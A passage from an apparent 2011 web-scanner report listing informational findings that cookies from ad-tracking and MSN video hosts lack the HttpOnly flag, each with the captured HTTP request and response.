Set-Cookie: ACOOKIE=C8ctADE3My4xOTMuMjE0LjI0My0xMDQ2MjM0NTYuMzAxNDc2NjQAAAAAAAABAAAAAQAAAPMst03zLLdNAQAAAAEAAADzLLdN8yy3TQAAAAA-; path=/; expires=Fri, 23-Apr-2021 20:37:07 GMT
P3P: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Date: Tue, 26 Apr 2011 20:37:06 GMT
Connection: close

GIF89a.............!.......,...........D..;

14.121. http://segment-pixel.invitemedia.com/pixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://segment-pixel.invitemedia.com
Path:   /pixel

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixel?pixelID=40657&partnerID=9&clientID=1603&key=segment HTTP/1.1
Host: segment-pixel.invitemedia.com
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=1620481;type=tdame177;cat=conte520;ord=1;num=6591672650538.385?
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=8218888f-9a83-4760-bd14-33b4666730c0; exchange_uid=eyIyIjogWyIyNzI0Mzg2MDE5MjI3ODQ2MjE4IiwgNzM0MjQ1XSwgIjQiOiBbIkNBRVNFQ0NyZjVYQkMyTExTQ3BjRWRBVjNzVSIsIDczNDI0NF19; partnerUID="eyIxOTkiOiBbIkJERkJGRkMyMzFBMjgyRDZFMjQ0NUI4RTRERTRBMkUwIiwgdHJ1ZV0sICI0OCI6IFsiNjIxMDk0NzA0Nzc4NjMwMDI2ODI4MzM4NDI2NDg1NDcxMjI4NzAiLCB0cnVlXX0="; subID="{}"; impressions="{\"578963\": [1303562003+ \"28aaa692-ea2e-30b9-be12-340089999af0\"+ 3241+ 40652+ 138]+ \"405594\": [1303072666+ \"2eefac09-883b-3f77-a8a9-19e6aac05dc5\"+ 22487+ 106641+ 227]}"; camp_freq_p1="eJzjkuFYMZ9VgFFict/ptywKjBqTmz+8ZTFgtADzuUQ4dt5nBsrOmr8WKMugwWDAYMEAAM06EHg="; io_freq_p1="eJzjEubYFirAKDG57/RbFgNGCzDNJcyx1wUoOGv+2rcsCgwaDAYMFgwAG9QMUw=="; dp_rec="{\"3\": 1303562003+ \"2\": 1303072666}"; segments_p1="eJzjYuZYEMzFzHE0h4uLY889RoF5y16/ZQEKTDfmYuE42M0IZJ7LATI7O5iBzNM5QGKiCpDf9J8JSB46AiKb/zMBALWhEtg="

Response

HTTP/1.1 302 Found
Date: Tue, 26 Apr 2011 18:38:05 GMT
Set-Cookie: segments_p1="eJzjYuZYEMzFzHE0h4uLY889RoF5y16/ZQEKTDfmYuE42M0IZJ7LARKnc4D8zg5mIHOiCpDZ9J8JSB46AiIv7gWRzf+ZAC1dFH4=";Version=1;Path=/;Domain=invitemedia.com;Expires=Wed, 25-Apr-2012 18:38:05 GMT;Max-Age=31536000
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Cache-Control: no-cache
Location: http://ad.yieldmanager.com/pixel?id=1147351&t=2
Content-Length: 0
Connection: close
Server: Jetty(7.3.1.v20110307)


14.122. http://style.omniture.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://style.omniture.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: style.omniture.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: elqCustomerGUID=8ee1d10d-cce1-42b6-8bb1-95eb59d8f5ba; campaign_stack=%5B%5B%22seo_other_referer%22%2C%221303601755097%22%5D%5D; _jsuid=9992808058213638945; search_stack=%5B%5B%22seo_other_referer%22%2C%221303601967106%22%5D%5D; s_cid=seo_other_referer; sc_locale_numbers=en_US; sc_locale=en_US; cms_site_lang=1; s_iid=30199; s_osc=30199; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; mbox=PC#1303601743323-887111.17#1306272581|session#1303852218540-851916#1303855241|check#true#1303853441

Response

HTTP/1.1 403 Forbidden
Server: Omniture AWS/2.0.0
Content-Length: 282
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Date: Tue, 26 Apr 2011 21:39:30 GMT
Connection: close
Set-Cookie: BIGipServerhttp_omniture=101320202.5892.0000; path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /
on this server.</p>
<hr>
<address
...[SNIP]...

14.123. http://tags.bluekai.com/site/1654  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tags.bluekai.com
Path:   /site/1654

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site/1654?ret=pp&_bkt=3&_bks=RMDhBtDtjMQ= HTTP/1.1
Host: tags.bluekai.com
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=1676624;type=count339;cat=landi852;u2=14610_0957_9_95;u4=38954353;u5=;u6=;u7=;ord=1;num=5058492012321.949?
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bko=; bkp1=; bku=exy99JnggW62duLG; bkw5=; bkou=KJhMRsOQRsq/pupQjp96B2Rp+eEV1p/66E101KSKrBAU9WUoOKz=; bk=ZJ461LV5c/sVIHOf; bkc=KJh5pfWn9VWRhdc4KfMrlalhe2psjMORvsPl0ARjdx1V1T7q5uVEw6Ybx+AAQd29ZSyVIfc/IbMUKDhF7dGIwzXqV/OrYWErNC199rkYWz05jmhks+CLQnG4KQZDLIEvZJ+b8P6vtnKOhVw+S5O9qkMzNYr4cK90apM+yLXIXg1cjr3PUKkVE3eAhff7yD02LZWYPlkFzhJftmzKdJ7ZkRd04dRHZB8VUNz+qr3PEK7eMnLfT3TBrmkP5ZpQkHc1Azf2rIXBaSCiPx==; bkst=KJyPMEar9MWx9nKQYk0Pckcx7ZEFg55tuR/WamiWe+J7nqrCHO0/ebHcKxS/OGZKQCdyOQGKAejcmpwu+mebO+YcDWx6EeslEiu7aW6ru7wrG6xU7uJVh48h7nqQ+ylx9pIqqzmXBmLhEgf+h8n3DRVP8lD3Hb+3Iw7UwE5+NQaTOfH/CVmkwSJNhvM5d7kG5ezeb1YZMn/jfsCH42UZ82EyKdjSVsRMCGpuZnHuu7yvZotxIJ9TIBFkBw6cDtx0Gy==

Response

HTTP/1.0 200 OK
Date: Tue, 26 Apr 2011 18:46:33 GMT
Set-Cookie: bklc=4db71309; expires=Thu, 28-Apr-2011 18:46:33 GMT; path=/; domain=.bluekai.com
P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="http://tags.bluekai.com/w3c/p3p.xml"
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: max-age=0, no-cache, no-store
Set-Cookie: bk=pAXpfXV5c/sVIHOf; expires=Sun, 23-Oct-2011 18:46:33 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkc=KJh5ppXnxPWRhdc4XK5tntbHlzjZ1aQGjUKPeHZ29zF5a9ZfkWhKQvHz5E4oe+bO1kA+5ih0c7UzI8Cm7Xfl2epcNGOIspeugiD9tBnNmcz7T7LrfpH5TJcjd8yFQJkb8UD1zO0QB+NSRjHu8wvRZlokByGzVLe3rqBYY/a1IyHBF4njOY8nQjmfdzTMFloQokT8/2l1YCu7FrX81amFgOF9PKfqZwQKt+0ew2BfjDdInIWOL2FZ863zZlokxd3TTmbmrvLeqM3PpxEyEQgZCXR57wzOUcPGF9==; expires=Sun, 23-Oct-2011 18:46:33 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkdc=res; expires=Wed, 27-Apr-2011 18:46:33 GMT; path=/; domain=.bluekai.com
BK-Server: 8d9f
Content-Length: 62
Content-Type: image/gif
Connection: keep-alive

GIF89a.............!..NETSCAPE2.0.....!..    ....,...........L..;

14.124. http://thwest.112.2o7.net/b/ss/devthwesttest/1/H.20.3/s66554260279361  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://thwest.112.2o7.net
Path:   /b/ss/devthwesttest/1/H.20.3/s66554260279361

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/devthwesttest/1/H.20.3/s66554260279361?AQB=1&ndh=1&t=26/3/2011%2015%3A7%3A42%202%20300&ns=thwest&g=about%3Ablank&s=1920x1200&c=16&j=1.5&v=Y&k=N&bw=1&bh=1&ct=lan&hp=Y&pe=lnk_e&pev1=http%3A//recs.richrelevance.com/rrserver/click&pid=about%3Ablank&oid=http%3A//recs.richrelevance.com/rrserver/click%3Fa%3D756bd9ec9a083c52%26vg%3D6b6c690e-c6eb-48e0-10ca-254be4d08&ot=A&oi=904&AQE=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: thwest.112.2o7.net

Response

HTTP/1.1 302 Found
Date: Tue, 26 Apr 2011 20:15:40 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi=[CS]v1|26DB93F605162D03-6000017780091B15[CE]; Expires=Sun, 24 Apr 2016 20:15:40 GMT; Domain=thwest.112.2o7.net; Path=/
Location: http://thwest.112.2o7.net/b/ss/devthwesttest/1/H.20.3/s66554260279361?AQB=1&pccr=true&vidn=26DB93F605162D03-6000017780091B15&&ndh=1&t=26/3/2011%2015%3A7%3A42%202%20300&ns=thwest&g=about%3Ablank&s=1920x1200&c=16&j=1.5&v=Y&k=N&bw=1&bh=1&ct=lan&hp=Y&pe=lnk_e&pev1=http%3A//recs.richrelevance.com/rrserver/click&pid=about%3Ablank&oid=http%3A//recs.richrelevance.com/rrserver/click%3Fa%3D756bd9ec9a083c52%26vg%3D6b6c690e-c6eb-48e0-10ca-254be4d08&ot=A&oi=904&AQE=1
X-C: ms-4.4.1
Expires: Mon, 25 Apr 2011 20:15:40 GMT
Last-Modified: Wed, 27 Apr 2011 20:15:40 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www388
Content-Length: 0
Content-Type: text/plain


14.125. http://thwest.112.2o7.net/b/ss/thwest/1/H.20.3/s63471572091802  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://thwest.112.2o7.net
Path:   /b/ss/thwest/1/H.20.3/s63471572091802

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/thwest/1/H.20.3/s63471572091802?AQB=1&ndh=1&t=26/3/2011%2015%3A3%3A9%202%20300&ns=thwest&pageName=default&g=http%3A//west.thomson.com/default.aspx&ch=Standard&server=EG-SWGWEB-A04&v7=%7B71c28bcc-895f-4239-9850-58ed6aba178d%7D&v18=Standard&c27=Homepage&c28=Homepage&c29=Homepage&v42=Direct%20Load&v43=Direct%20Load&v45=Direct%20Load&v46=n/a&v47=Direct%20Load&v48=Direct%20Load&c50=v%201.2.3&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1082&bh=954&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: thwest.112.2o7.net
Proxy-Connection: keep-alive
Referer: http://west.thomson.com/default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_kbuchzx7Ex60bodah=[CS]v4|26D5B4CB05010768-40000100203F0C39|4DAB6981[CE]; s_vi_efmdyx7Fx7Cdyx7Fc=[CS]v4|26D9C884851603AF-6000017820228B75|4DB39107[CE]; s_vi_kaquvg=[CS]v4|26D9C88705163068-600001A62005EACD|4DB3910D[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|26DA3EC40516221C-6000018240050B56|4DB47D87[CE]; s_vi_fx7Bhjeljfd=[CS]v4|26DA3EC40516221C-6000018240050B58|4DB47D87[CE]; s_vi_kjodgjid=[CS]v4|26DB88E0051623F8-40000183606A19F8|4DB711BC[CE]

Response

HTTP/1.1 302 Found
Date: Tue, 26 Apr 2011 20:03:01 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi=[CS]v1|26DB927A85162D03-400001778002E765[CE]; Expires=Sun, 24 Apr 2016 20:03:01 GMT; Domain=thwest.112.2o7.net; Path=/
Location: http://thwest.112.2o7.net/b/ss/thwest/1/H.20.3/s63471572091802?AQB=1&pccr=true&vidn=26DB927A85162D03-400001778002E765&&ndh=1&t=26/3/2011%2015%3A3%3A9%202%20300&ns=thwest&pageName=default&g=http%3A//west.thomson.com/default.aspx&ch=Standard&server=EG-SWGWEB-A04&v7=%7B71c28bcc-895f-4239-9850-58ed6aba178d%7D&v18=Standard&c27=Homepage&c28=Homepage&c29=Homepage&v42=Direct%20Load&v43=Direct%20Load&v45=Direct%20Load&v46=n/a&v47=Direct%20Load&v48=Direct%20Load&c50=v%201.2.3&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1082&bh=954&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1
X-C: ms-4.4.1
Expires: Mon, 25 Apr 2011 20:03:01 GMT
Last-Modified: Wed, 27 Apr 2011 20:03:01 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www388
Content-Length: 0
Content-Type: text/plain


14.126. http://tracker.marinsm.com/tp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tracker.marinsm.com
Path:   /tp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /tp?act=1&cid=4561iuf9g3q501317&tz=5&ref=http%3A%2F%2Fwww.aptm.phoenix.edu%2F%3Fcreative_desc%3D20DR_Button_Orange_728x90_F9_Tag_swf%26provider%3DMSN%26keyword%3Dmsn_careers_728x90_425006%26user3%3D1%26unit%3Ddir%26channel%3Dbanr%26initiative%3Dgen%26mktg_prog%3Dgen%26placement%3Ddsply%26version%3D728x90%26classification%3Ddir_dsply%26destination%3Daptm%26distribution%3Dplcmt_targ%26user1%3Dcpm%26user2%3Ddr%26creative_id%3D38954353%26pvp_campaign%3D14610_0957_9_95%26cm_mmc%3Ddir-_-banr-_-MSN-_-gen%26cm_mmca1%3Dgen%26cm_mmca2%3Ddsply%26cm_mmca3%3D38954353%26cm_mmca4%3D20DR_Button_Orange_728x90_F9_Tag_swf%26cm_mmca5%3D728x90%26cm_mmca6%3Ddir_dsply%26cm_mmca7%3Dmsn_careers_728x90_425006%26cm_mmca8%3Daptm%26cm_mmca9%3Dplcmt_targ%26cm_mmca11%3Dcpm%26cm_mmca12%3Ddr%26cm_mmca13%3D1&page=http%3A%2F%2Ffls.doubleclick.net%2Factivityi%3Bsrc%3D1676624%3Btype%3Dcount339%3Bcat%3Dlandi852%3Bu2%3D14610_0957_9_95%3Bu4%3D38954353%3Bu5%3D%3Bu6%3D%3Bu7%3D%3Bord%3D1%3Bnum%3D5058492012321.949%3F&uuid=389E4AAF-0A51-4C2B-B96D-B96D82DE5465&rnd=1970267086 HTTP/1.1
Host: tracker.marinsm.com
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=1676624;type=count339;cat=landi852;u2=14610_0957_9_95;u4=38954353;u5=;u6=;u7=;ord=1;num=5058492012321.949?
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _msuuid=923F0BAD-ECCD-4A46-B765-0D3484A87F4C

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.2.3.GA (build: SVNTag=JBoss_4_2_3_GA date=200807181417)/JBossWeb-2.0
P3P: CP="NOI DSP COR NID CUR ADM DEV OUR BUS"
Pragma: no-cache
Cache-Control: private, no-cache
Content-Type: image/gif
Content-Length: 35
Date: Tue, 26 Apr 2011 18:46:41 GMT
Connection: close
Set-Cookie: _msuuid=923F0BAD-ECCD-4A46-B765-0D3484A87F4C; Domain=marinsm.com; Expires=Wed, 25-Apr-2012 18:46:41 GMT; Path=/

GIF89a.............,...........D..;

14.127. http://ushealth2.opt.video.msn.com/optimizevc.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ushealth2.opt.video.msn.com
Path:   /optimizevc.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /optimizevc.aspx?csid=&p=ushealth2&ind=1&ps=3&gc=1&ver=2&alg=&cfgCsid=MSNhealth&cfgName=HealthHP_Gallery&ck=gal&pl=http%3A%2F%2Fhealth.msn.com%2F&rl=http%3A%2F%2Fwww.msn.com%2F HTTP/1.1
Host: ushealth2.opt.video.msn.com
Proxy-Connection: keep-alive
Referer: http://img.widgets.video.s-msn.com/fl/gallerywidget/current/gallerywidget.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=V=3&GUID=fdd1ad8ef8e24cf9bbad7ff7c197392d; mh=MSFT; CC=US; CULTURE=EN-US; zip=z:75207|la:32.7825|lo:-96.8207|ci:Dallas|c:US; expid=id=79281a2784894bbe8e11de358b20f4da&bd=2011-04-23T14:00:24.831&v=2; MUID=B506C07761D7465D924574124E3C14DF; opd=; flt=46065; s_cc=true; s_sq=%5B%5BB%5D%5D; Sample=37

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=600
Content-Type: text/xml; charset=utf-8
Expires: Tue, 26 Apr 2011 18:56:09 GMT
Last-Modified: Tue, 26 Apr 2011 18:46:09 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: lastVisit1=4/26/2011 6:46:09 PM; expires=Tue, 26-Apr-2061 18:46:09 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 26 Apr 2011 18:46:09 GMT
Content-Length: 87

...<data><context tk="&amp;lv=inf&amp;rt=hp&amp;ck=gal&amp;flt=var-C&amp;r=3" /></data>

14.128. http://usmoneynews.opt.video.msn.com/optimizevc.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://usmoneynews.opt.video.msn.com
Path:   /optimizevc.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /optimizevc.aspx?csid=&p=usMoneyNews&ind=1&ps=4&gc=1&ver=2&alg=&cfgCsid=MSNmoney&cfgName=money-gallery-investing-smart-pool&ck=gal&pl=http%3A%2F%2Fmoney.msn.com%2Finvesting%2F HTTP/1.1
Host: usmoneynews.opt.video.msn.com
Proxy-Connection: keep-alive
Referer: http://img.widgets.video.s-msn.com/fl/gallerywidget/current/gallerywidget.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=V=3&GUID=fdd1ad8ef8e24cf9bbad7ff7c197392d; mh=MSFT; CC=US; CULTURE=EN-US; zip=z:75207|la:32.7825|lo:-96.8207|ci:Dallas|c:US; expid=id=79281a2784894bbe8e11de358b20f4da&bd=2011-04-23T14:00:24.831&v=2; MUID=B506C07761D7465D924574124E3C14DF; Sample=37; opd=; flt=46065

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=600
Content-Type: text/xml; charset=utf-8
Expires: Tue, 26 Apr 2011 18:51:00 GMT
Last-Modified: Tue, 26 Apr 2011 18:41:00 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: lastVisit1=4/26/2011 6:41:00 PM; expires=Tue, 26-Apr-2061 18:41:00 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 26 Apr 2011 18:40:59 GMT
Content-Length: 88

...<data><context tk="&amp;lv=inf&amp;rt=no&amp;ck=gal&amp;flt=var-C&amp;r=36" /></data>

14.129. http://usmoneytaxes.opt.video.msn.com/optimizevc.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://usmoneytaxes.opt.video.msn.com
Path:   /optimizevc.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /optimizevc.aspx?csid=&p=usMoneyTaxes&ind=1&ps=4&gc=1&ver=2&alg=&cfgCsid=MSNmoney&cfgName=money-gallery-v2-site-wide&ck=gal&pl=http%3A%2F%2Fmoney.msn.com%2Ftaxes%2F HTTP/1.1
Host: usmoneytaxes.opt.video.msn.com
Proxy-Connection: keep-alive
Referer: http://img.widgets.video.s-msn.com/fl/gallerywidget/current/gallerywidget.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=V=3&GUID=fdd1ad8ef8e24cf9bbad7ff7c197392d; mh=MSFT; CC=US; CULTURE=EN-US; zip=z:75207|la:32.7825|lo:-96.8207|ci:Dallas|c:US; expid=id=79281a2784894bbe8e11de358b20f4da&bd=2011-04-23T14:00:24.831&v=2; MUID=B506C07761D7465D924574124E3C14DF; Sample=37

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=600
Content-Type: text/xml; charset=utf-8
Expires: Tue, 26 Apr 2011 18:50:18 GMT
Last-Modified: Tue, 26 Apr 2011 18:40:18 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: lastVisit1=4/26/2011 6:40:18 PM; expires=Tue, 26-Apr-2061 18:40:18 GMT; path=/
Set-Cookie: opd=; domain=opt.video.msn.com; expires=Tue, 26-Apr-2011 19:40:18 GMT; path=/
Set-Cookie: flt=32677; domain=opt.video.msn.com; expires=Tue, 26-Apr-2061 18:40:18 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 26 Apr 2011 18:40:17 GMT
Content-Length: 88

...<data><context tk="&amp;lv=inf&amp;rt=no&amp;ck=gal&amp;flt=var-A&amp;r=14" /></data>

14.130. http://usrealestate2.opt.video.msn.com/optimizevc.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://usrealestate2.opt.video.msn.com
Path:   /optimizevc.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /optimizevc.aspx?csid=&p=usRealEstate2&ind=1&ps=4&gc=1&ver=2&alg=&cfgCsid=MSNRealEstate&cfgName=MSNRealEstate_CustomGallery_HP&ck=gal&pl=http%3A%2F%2Frealestate.msn.com%2F HTTP/1.1
Host: usrealestate2.opt.video.msn.com
Proxy-Connection: keep-alive
Referer: http://img.widgets.video.s-msn.com/fl/gallerywidget/current/gallerywidget.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=V=3&GUID=fdd1ad8ef8e24cf9bbad7ff7c197392d; mh=MSFT; CC=US; CULTURE=EN-US; zip=z:75207|la:32.7825|lo:-96.8207|ci:Dallas|c:US; expid=id=79281a2784894bbe8e11de358b20f4da&bd=2011-04-23T14:00:24.831&v=2; MUID=B506C07761D7465D924574124E3C14DF; Sample=37; opd=; flt=46065

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=600
Content-Type: text/xml; charset=utf-8
Expires: Tue, 26 Apr 2011 18:50:37 GMT
Last-Modified: Tue, 26 Apr 2011 18:40:37 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: lastVisit1=4/26/2011 6:40:37 PM; expires=Tue, 26-Apr-2061 18:40:37 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 26 Apr 2011 18:40:36 GMT
Content-Length: 88

...<data><context tk="&amp;lv=inf&amp;rt=no&amp;ck=gal&amp;flt=var-C&amp;r=17" /></data>

14.131. http://video.msn.com/soapboxservice2.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://video.msn.com
Path:   /soapboxservice2.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /soapboxservice2.aspx?mn=GetCountryCode HTTP/1.1
Host: video.msn.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=V=3&GUID=fdd1ad8ef8e24cf9bbad7ff7c197392d; mh=MSFT; CC=US; CULTURE=EN-US; zip=z:75207|la:32.7825|lo:-96.8207|ci:Dallas|c:US; expid=id=79281a2784894bbe8e11de358b20f4da&bd=2011-04-23T14:00:24.831&v=2; MUID=B506C07761D7465D924574124E3C14DF; s_cc=true; s_sq=%5B%5BB%5D%5D; Sample=37

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/xml; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
Machine: CH1********910
X-AspNet-Version: 2.0.50727
Set-Cookie: zip=z:75207|la:32.7825|lo:-96.8207|ci:Dallas|c:US; domain=msn.com; expires=Tue, 03-May-2011 18:46:54 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 26 Apr 2011 18:46:54 GMT
Connection: keep-alive
Content-Length: 136

